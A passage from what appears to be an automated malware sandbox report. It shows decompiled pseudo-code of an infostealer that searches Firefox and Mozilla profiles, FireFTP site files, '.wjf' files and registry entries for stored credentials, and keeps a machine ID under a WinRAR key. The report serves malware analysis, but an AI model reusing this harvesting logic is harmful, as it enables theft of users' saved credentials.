                                                                        • CoCreateInstance.OLE32(00415A6D,00000000,00000005,00415A7D,?), ref: 0040A4DD
                                                                        • StrStrIW.SHLWAPI(00000000,00415A9D), ref: 0040A554
                                                                        • CoTaskMemFree.OLE32(00000000,00000000,00415A9D), ref: 0040A57F
                                                                        • CoTaskMemFree.OLE32(00000000,00000000,00000000,00415A9D), ref: 0040A58D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeTask$CreateInstance
                                                                        • String ID: ($http://www.facebook.com/
                                                                        • API String ID: 2903366249-3677894361
                                                                        • Opcode ID: 26fd28d9b999e4cc32093d22da46df2e4bc8434568c89ba86784230ad1d43a58
                                                                        • Instruction ID: e0fdaf64ef7de16aafdf2735d0d685e72c2ce6657ce01d53c8c3a7317b8eeee1
                                                                        • Opcode Fuzzy Hash: 26fd28d9b999e4cc32093d22da46df2e4bc8434568c89ba86784230ad1d43a58
                                                                        • Instruction Fuzzy Hash: BF310530A00209FBDF11DFA0DC85BCEBB75BF08348F248166E500BA290D3799A95DB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00409A1D(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v269;
                                                                        				void* _t12;
                                                                        				void* _t23;
                                                                        				void* _t24;
                                                                        
                                                                        				_t24 = __edx;
                                                                        				_t23 = __ecx;
                                                                        				_v8 = E0040150D(_a4, 0x25, 0);
                                                                        				_t12 = E00401DCE(__eflags, 0x1a);
                                                                        				_t26 = _t12;
                                                                        				if(_t12 != 0) {
                                                                        					E00404131(_a4, E00401D69(_t12, "\\Mozilla\\Firefox\\"), "fireFTPsites.dat", 0xbeef1000); // executed
                                                                        					E004017D5(_t20);
                                                                        				}
                                                                        				 *0x415824 = 1;
                                                                        				GetCurrentDirectoryA(0x104,  &_v269);
                                                                        				E0040988E(_t23, _a4,  *0x4140fe, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
                                                                        				E0040988E(_t23, _a4, 0x80000002, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
                                                                        				SetCurrentDirectoryA( &_v269);
                                                                        				return E00401553(_t24, _t26, _a4, _v8);
                                                                        			}









                                                                        APIs
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409A7A
                                                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409ABF
                                                                          • Part of subcall function 00401D69: lstrlenA.KERNEL32(?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D8A
                                                                          • Part of subcall function 00401D69: lstrlenA.KERNEL32(?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000), ref: 00401D94
                                                                          • Part of subcall function 00401D69: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401DA8
                                                                          • Part of subcall function 00401D69: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000), ref: 00401DB1
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: CurrentDirectorylstrlen$FreeLocallstrcatlstrcpy
                                                                        • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\$fireFTPsites.dat
                                                                        • API String ID: 3007406096-624000163
                                                                        • Opcode ID: 5764e6e8ef470ff0ed49208cfaf5de5449351cf3b9563aac8ac0db6f1d2449a4
                                                                        • Instruction ID: 60e21d86f469014f8f7ff040f91813a7819b2797126ab95d7269fae31e95df33
                                                                        • Opcode Fuzzy Hash: 5764e6e8ef470ff0ed49208cfaf5de5449351cf3b9563aac8ac0db6f1d2449a4
                                                                        • Instruction Fuzzy Hash: 24017570641608FEEF117FA1CC47FC93A699F84748F104037B608B51E2EABD59E0966C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E0040988E(void* __ecx, intOrPtr _a4, void* _a8, char* _a12, char* _a16, intOrPtr _a20) {
                                                                        				void* _v8;
                                                                        				char* _v12;
                                                                        				int _v16;
                                                                        				int _v20;
                                                                        				intOrPtr _v24;
                                                                        				intOrPtr _v28;
                                                                        				long _t37;
                                                                        				void* _t48;
                                                                        				void* _t49;
                                                                        				intOrPtr _t51;
                                                                        				void* _t59;
                                                                        
                                                                        				_t59 = __ecx;
                                                                        				if(StrStrIA(_a12, _a16) != 0) {
                                                                        					_t48 = E00401C8E(_a8, _a12, "PathToExe", 0); // executed
                                                                        					_t49 = _t48;
                                                                        					_t61 = _t49;
                                                                        					if(_t49 != 0) {
                                                                        						_push(_t49);
                                                                        						_t51 = E0040234A(_t61, _t49);
                                                                        						_t62 = _t51;
                                                                        						if(_t51 != 0) {
                                                                        							_v28 = _t51;
                                                                        							_t54 = E00401DCE(_t62, 0x1a);
                                                                        							if(E00401DCE(_t62, 0x1a) != 0) {
                                                                        								E00409713(_a4, E00401D69(_t54, _a20), _v28);
                                                                        								E004017D5(_t56);
                                                                        							}
                                                                        							E004017D5(_v28);
                                                                        						}
                                                                        						E004017D5();
                                                                        					}
                                                                        				}
                                                                        				_v12 = E004017EC(0x800);
                                                                        				_t37 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                        				if(_t37 == 0) {
                                                                        					_v20 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v20, _v12,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v24 = E00401D69(E00401D15(_a12, "\\"), _v12);
                                                                        						E0040988E(_t59, _a4, _a8, _v24, _a16, _a20);
                                                                        						E004017D5(_v24);
                                                                        						_v20 = _v20 + 1;
                                                                        					}
                                                                        					RegCloseKey(_v8);
                                                                        				}
                                                                        				return E004017D5(_v12);
                                                                        			}

                                                                        APIs
                                                                        • StrStrIA.SHLWAPI(?,?), ref: 0040989A
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409911
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0040993D
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409985
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
                                                                          • Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
                                                                          • Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1
                                                                          • Part of subcall function 00401D69: lstrlenA.KERNEL32(?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D8A
                                                                          • Part of subcall function 00401D69: lstrlenA.KERNEL32(?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000), ref: 00401D94
                                                                          • Part of subcall function 00401D69: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401DA8
                                                                          • Part of subcall function 00401D69: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000), ref: 00401DB1
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: lstrlen$CloseEnumFreeLocalOpenlstrcatlstrcpy
                                                                        • String ID: PathToExe
                                                                        • API String ID: 3012581338-1982016430
                                                                        • Opcode ID: 81213df79e2693ca029aaa92a1708047da5bc6501aa9f1bfd56f0bd47ce8e5ed
                                                                        • Instruction ID: 9921fcbb10fb3e88fa5f2a06c9976cc3b0665bb7c53d4c2d3e03b44b5fdf6235
                                                                        • Opcode Fuzzy Hash: 81213df79e2693ca029aaa92a1708047da5bc6501aa9f1bfd56f0bd47ce8e5ed
                                                                        • Instruction Fuzzy Hash: 65310C7291010EBBDF116FE2CC42FEE7A75AF04304F10403AB610B51F2DA799D61AB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 78%
                                                                        			E00402725(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                        				char _v8;
                                                                        				intOrPtr _v12;
                                                                        				void* _v16;
                                                                        				char _v277;
                                                                        				void* _t23;
                                                                        				void* _t24;
                                                                        				long _t27;
                                                                        				void* _t35;
                                                                        				void* _t36;
                                                                        				void** _t41;
                                                                        				void* _t43;
                                                                        				void* _t45;
                                                                        				void* _t51;
                                                                        				void* _t53;
                                                                        
                                                                        				_t53 = __edx;
                                                                        				_t23 = E00401C8E( *0x4140fe, "Software\\WinRAR", _a4, _a8); // executed
                                                                        				_t24 = _t23;
                                                                        				if(_t24 != 0) {
                                                                        					return _t24;
                                                                        				}
                                                                        				_t51 = 0;
                                                                        				_t27 = GetTempPathA(0x104,  &_v277);
                                                                        				if(_t27 == 0 || _t27 > 0x104) {
                                                                        					L12:
                                                                        					return _t51;
                                                                        				} else {
                                                                        					E00401000( &_v8, _t53,  &_v8);
                                                                        					if(E004024D7( &_v277) != 0) {
                                                                        						_t35 = E00401D15( &_v277, _a4);
                                                                        					} else {
                                                                        						_t35 = E00401D69(E00401D15( &_v277, "\\"), _a4);
                                                                        					}
                                                                        					_push(_t35);
                                                                        					_t36 = E004011D5(_t35, _t53, _t35, _v8);
                                                                        					_t37 = _t36;
                                                                        					if(_t36 != 0) {
                                                                        						_v12 = E0040106A(_t37, _t53, _v8);
                                                                        						if(_v12 != 0) {
                                                                        							_t41 =  &_v16;
                                                                        							_push(_t41);
                                                                        							_push(_v8);
                                                                        							L00410DBE();
                                                                        							if(_t41 >= 0) {
                                                                        								_t43 = GlobalLock(_v16);
                                                                        								if(_t43 != 0) {
                                                                        									_t51 = E004017EC(_v12);
                                                                        									_t45 = _t43;
                                                                        									E00401823(_t45, _t51, _v12);
                                                                        									GlobalUnlock(_v16);
                                                                        									_push(_v12);
                                                                        									_pop( *__eax);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					E00401019(E004017D5(), _t53, _v8);
                                                                        					goto L12;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • GetTempPathA.KERNEL32(00000104,?,Software\WinRAR,?,?,?,?,0041049F,Client Hash,?,?,00000000), ref: 0040275B
                                                                          • Part of subcall function 00401000: CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,0040202B,?,?,?,?,00410BE4), ref: 00401010
                                                                        • GetHGlobalFromStream.OLE32(00000000,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000104,?,Software\WinRAR,?,?), ref: 004027DD
                                                                        • GlobalLock.KERNEL32 ref: 004027E9
                                                                        • GlobalUnlock.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 0040280B
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
                                                                          • Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
                                                                          • Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D
                                                                          • Part of subcall function 00401D69: lstrlenA.KERNEL32(?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D8A
                                                                          • Part of subcall function 00401D69: lstrlenA.KERNEL32(?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000), ref: 00401D94
                                                                          • Part of subcall function 00401D69: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401DA8
                                                                          • Part of subcall function 00401D69: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000), ref: 00401DB1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: Globallstrlen$Streamlstrcatlstrcpy$CreateFromLockPathTempUnlock
                                                                        • String ID: Software\WinRAR
                                                                        • API String ID: 2423343858-224198155
                                                                        • Opcode ID: 7cf850b0c05618a1467c1498a600d9d140c7b85ce8ea629bc749fe13805ec3b9
                                                                        • Instruction ID: 7478491bfa33174de51c22f170f017b73afdc2e34cee783fbd344f0ac75d9f77
                                                                        • Opcode Fuzzy Hash: 7cf850b0c05618a1467c1498a600d9d140c7b85ce8ea629bc749fe13805ec3b9
                                                                        • Instruction Fuzzy Hash: 3C212F76A00109BADF05BBE1CD4A9DDBA7DEF44358F108177B600B20E1E6BD8A949B58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004045ED(intOrPtr _a4, char* _a8) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				int _v2072;
                                                                        				char _v2076;
                                                                        				long _t31;
                                                                        				long _t32;
                                                                        				intOrPtr _t44;
                                                                        
                                                                        				_t31 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
                                                                        				_t32 = _t31;
                                                                        				if(_t32 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumValueA(_v8, _v12,  &_v2064,  &_v16, 0,  &_v2072, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						if(_v2072 == 1 || _v2072 == 7) {
                                                                        							if(StrStrIA( &_v2064, "Line") == 0) {
                                                                        								L13:
                                                                        								_v12 = _v12 + 1;
                                                                        								continue;
                                                                        							}
                                                                        							_t44 = E00401C8E( *0x4140fe, _a8,  &_v2064,  &_v2076);
                                                                        							if(_t44 == 0) {
                                                                        								goto L13;
                                                                        							}
                                                                        							_v2068 = _t44;
                                                                        							E00401486(_a4, 0xbeef0001);
                                                                        							if(_v2072 != 1) {
                                                                        								E00401486(_a4, 1);
                                                                        							} else {
                                                                        								E00401486(_a4, 0);
                                                                        							}
                                                                        							E004014BC(_a4, _v2068, _v2076);
                                                                        							E004017D5(_v2068);
                                                                        							goto L13;
                                                                        						} else {
                                                                        							_v12 = _v12 + 1;
                                                                        							continue;
                                                                        						}
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t32;
                                                                        			}














                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 00404603
                                                                        • RegEnumValueA.ADVAPI32 ref: 0040463C
                                                                        • StrStrIA.SHLWAPI(?,Line), ref: 0040466D
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000001,00000000,00000000,?,Line), ref: 004046F2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpenValue
                                                                        • String ID: Line
                                                                        • API String ID: 4012628704-1898322888
                                                                        • Opcode ID: 641747fce4c212e13bc605f62b9cee1079d8ed9a9c8af40e1d0c65b7a63f3b00
                                                                        • Instruction ID: 7fcf9f9aae3f6b2ea9e0e0dabca749cb460151442f66bdead352d5342de98d71
                                                                        • Opcode Fuzzy Hash: 641747fce4c212e13bc605f62b9cee1079d8ed9a9c8af40e1d0c65b7a63f3b00
                                                                        • Instruction Fuzzy Hash: EF211C7180011CBADF219B91CC41BED7BB9BF41304F0484B6B644B11A1EB7E9F959F99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040E3E5(void* __ecx, void* _a4, char* _a8, intOrPtr _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				char* _v2068;
                                                                        				int _v2072;
                                                                        				char _v2076;
                                                                        				long _t27;
                                                                        				long _t28;
                                                                        				char* _t37;
                                                                        				void* _t43;
                                                                        
                                                                        				_t43 = __ecx;
                                                                        				_t27 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
                                                                        				_t28 = _t27;
                                                                        				if(_t28 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumValueA(_v8, _v12,  &_v2064,  &_v16, 0,  &_v2072, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						__eflags = _v2072 - 1;
                                                                        						if(_v2072 == 1) {
                                                                        							_t37 = E00401C8E(_a4, _a8,  &_v2064,  &_v2076);
                                                                        							__eflags = _t37;
                                                                        							if(_t37 == 0) {
                                                                        								L10:
                                                                        								_v12 = _v12 + 1;
                                                                        								continue;
                                                                        							}
                                                                        							_v2068 = _t37;
                                                                        							__eflags = StrStrIA(_v2068, ".wjf");
                                                                        							if(__eflags != 0) {
                                                                        								E0040E163(_t43, __eflags, _a12, _v2068);
                                                                        							}
                                                                        							E004017D5(_v2068);
                                                                        							goto L10;
                                                                        						}
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t28;
                                                                        			}















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E3F8
                                                                        • RegEnumValueA.ADVAPI32 ref: 0040E431
                                                                        • StrStrIA.SHLWAPI(?,.wjf,00000000,000007FF,?,?), ref: 0040E478
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E4A5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpenValue
                                                                        • String ID: .wjf
                                                                        • API String ID: 4012628704-198459012
                                                                        • Opcode ID: 9f7659396e286a54eecc894f8550f607aa07d0afae708ed19e182bd8aa094efd
                                                                        • Instruction ID: 2985ecba4934f64bc87a956b145e7b99f857eac3f65c13796da90851c2a9d639
                                                                        • Opcode Fuzzy Hash: 9f7659396e286a54eecc894f8550f607aa07d0afae708ed19e182bd8aa094efd
                                                                        • Instruction Fuzzy Hash: 0211FC7291010CAADF119B92CC41BEDBBB9BF00304F0484B6A514B41A1DB799EA6AF99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 63%
                                                                        			E0040434C(void* __ecx, void* __edx) {
                                                                        				signed char _v5;
                                                                        				signed char _v6;
                                                                        				signed char _v7;
                                                                        				signed char _v8;
                                                                        				signed char _v9;
                                                                        				signed char _v10;
                                                                        				signed char _v11;
                                                                        				signed char _v12;
                                                                        				signed short _v14;
                                                                        				signed short _v16;
                                                                        				char _v20;
                                                                        				char _v120;
                                                                        				char _v124;
                                                                        				void* _t19;
                                                                        				char* _t21;
                                                                        
                                                                        				_t19 = E00402725(__ecx, __edx, "HWID",  &_v124); // executed
                                                                        				_push(_t19);
                                                                        				if(_t19 == 0 || _v124 <= 0x14) {
                                                                        					_t21 =  &_v20;
                                                                        					_push(_t21);
                                                                        					L00410DC4();
                                                                        					if(_t21 >= 0) {
                                                                        						wsprintfA( &_v120, "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}", _v20, _v16 & 0x0000ffff, _v14 & 0x0000ffff, _v12 & 0x000000ff, _v11 & 0x000000ff, _v10 & 0x000000ff, _v9 & 0x000000ff, _v8 & 0x000000ff, _v7 & 0x000000ff, _v6 & 0x000000ff, _v5 & 0x000000ff);
                                                                        						E0040260B("HWID",  &_v120, lstrlenA( &_v120));
                                                                        					}
                                                                        				}
                                                                        				return E004017D5();
                                                                        			}



















                                                                        APIs
                                                                          • Part of subcall function 00402725: GetTempPathA.KERNEL32(00000104,?,Software\WinRAR,?,?,?,?,0041049F,Client Hash,?,?,00000000), ref: 0040275B
                                                                          • Part of subcall function 00402725: GetHGlobalFromStream.OLE32(00000000,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000104,?,Software\WinRAR,?,?), ref: 004027DD
                                                                          • Part of subcall function 00402725: GlobalLock.KERNEL32 ref: 004027E9
                                                                          • Part of subcall function 00402725: GlobalUnlock.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 0040280B
                                                                        • CoCreateGuid.OLE32(?,00000000,HWID,?), ref: 0040436F
                                                                        • wsprintfA.USER32 ref: 004043B6
                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,HWID,?), ref: 004043C2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Global$CreateFromGuidLockPathStreamTempUnlocklstrlenwsprintf
                                                                        • String ID: HWID${%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
                                                                        • API String ID: 1852535927-1100116640
                                                                        • Opcode ID: 4b80c48c8f5c6b84af181e8d95d47abb8a1bb5b393dc5a666caa3c1ef2c42a52
                                                                        • Instruction ID: 0e75cfa17dfb2f7b8333cb936f596bb44a555b5fa009e7f621812bee52e14eac
                                                                        • Opcode Fuzzy Hash: 4b80c48c8f5c6b84af181e8d95d47abb8a1bb5b393dc5a666caa3c1ef2c42a52
                                                                        • Instruction Fuzzy Hash: 9C113CA690419D7DCB61E2F64D06DFFBAFC590C605B1400A7B6A0E20C2E67D97409B38
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00409996(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v269;
                                                                        				void* _t17;
                                                                        				void* _t18;
                                                                        				void* _t19;
                                                                        
                                                                        				_t19 = __eflags;
                                                                        				_t18 = __edx;
                                                                        				_t17 = __ecx;
                                                                        				_v8 = E0040150D(_a4, 0x24, 0);
                                                                        				 *0x415824 = 0;
                                                                        				GetCurrentDirectoryA(0x104,  &_v269);
                                                                        				E0040988E(_t17, _a4,  *0x4140fe, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
                                                                        				E0040988E(_t17, _a4, 0x80000002, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
                                                                        				SetCurrentDirectoryA( &_v269);
                                                                        				return E00401553(_t18, _t19, _a4, _v8);
                                                                        			}









                                                                        APIs
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004099C4
                                                                          • Part of subcall function 0040988E: StrStrIA.SHLWAPI(?,?), ref: 0040989A
                                                                          • Part of subcall function 0040988E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409911
                                                                          • Part of subcall function 0040988E: RegEnumKeyExA.ADVAPI32 ref: 0040993D
                                                                          • Part of subcall function 0040988E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409985
                                                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409A09
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$CloseEnumOpen
                                                                        • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\
                                                                        • API String ID: 3062143572-2631691096
                                                                        • Opcode ID: be824a605328de8f771db5039d6aa351b88e09572b38e9bb7d2f3b4bf0ba3e20
                                                                        • Instruction ID: ee68b02c4fe34adabb2d5b7da2459322c65d04647a6db10db078e7f2ecd853e2
                                                                        • Opcode Fuzzy Hash: be824a605328de8f771db5039d6aa351b88e09572b38e9bb7d2f3b4bf0ba3e20
                                                                        • Instruction Fuzzy Hash: 96F01231540608FEDF11BF91CC47FC93B659B84748F108076B609B51E2E7B95AE09A5C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00409BE1(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v269;
                                                                        				void* _t17;
                                                                        				void* _t18;
                                                                        				void* _t19;
                                                                        
                                                                        				_t19 = __eflags;
                                                                        				_t18 = __edx;
                                                                        				_t17 = __ecx;
                                                                        				_v8 = E0040150D(_a4, 0x28, 0);
                                                                        				 *0x415824 = 0;
                                                                        				GetCurrentDirectoryA(0x104,  &_v269);
                                                                        				E0040988E(_t17, _a4,  *0x4140fe, "Software\\Mozilla", "Mozilla", "\\Mozilla\\Profiles\\");
                                                                        				E0040988E(_t17, _a4, 0x80000002, "Software\\Mozilla", "Mozilla", "\\Mozilla\\Profiles\\"); // executed
                                                                        				SetCurrentDirectoryA( &_v269);
                                                                        				return E00401553(_t18, _t19, _a4, _v8);
                                                                        			}









                                                                        APIs
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409C0F
                                                                          • Part of subcall function 0040988E: StrStrIA.SHLWAPI(?,?), ref: 0040989A
                                                                          • Part of subcall function 0040988E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409911
                                                                          • Part of subcall function 0040988E: RegEnumKeyExA.ADVAPI32 ref: 0040993D
                                                                          • Part of subcall function 0040988E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409985
                                                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409C54
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$CloseEnumOpen
                                                                        • String ID: Mozilla$Software\Mozilla$\Mozilla\Profiles\
                                                                        • API String ID: 3062143572-2716603926
                                                                        • Opcode ID: 1779ce4a3d06fe848c2ece47419dc04276180907ba81840e26580dad2bf40cf0
                                                                        • Instruction ID: bbdd13b51472c6f4fc299ffa726447a69ce41118111f745e7b4f7d92f38d9e6c
                                                                        • Opcode Fuzzy Hash: 1779ce4a3d06fe848c2ece47419dc04276180907ba81840e26580dad2bf40cf0
                                                                        • Instruction Fuzzy Hash: 5AF0627055060CFADB51BFA1CD03FC93A659B94784F108036B604741F2DAB94AD09B9D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E0040CABE(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				void* _t10;
                                                                        				void* _t12;
                                                                        				char* _t20;
                                                                        				void* _t29;
                                                                        				char* _t30;
                                                                        
                                                                        				_t29 = __edx;
                                                                        				_v8 = E0040150D(_a4, 0x42, 0);
                                                                        				_t30 =  *0x414082; // 0x0
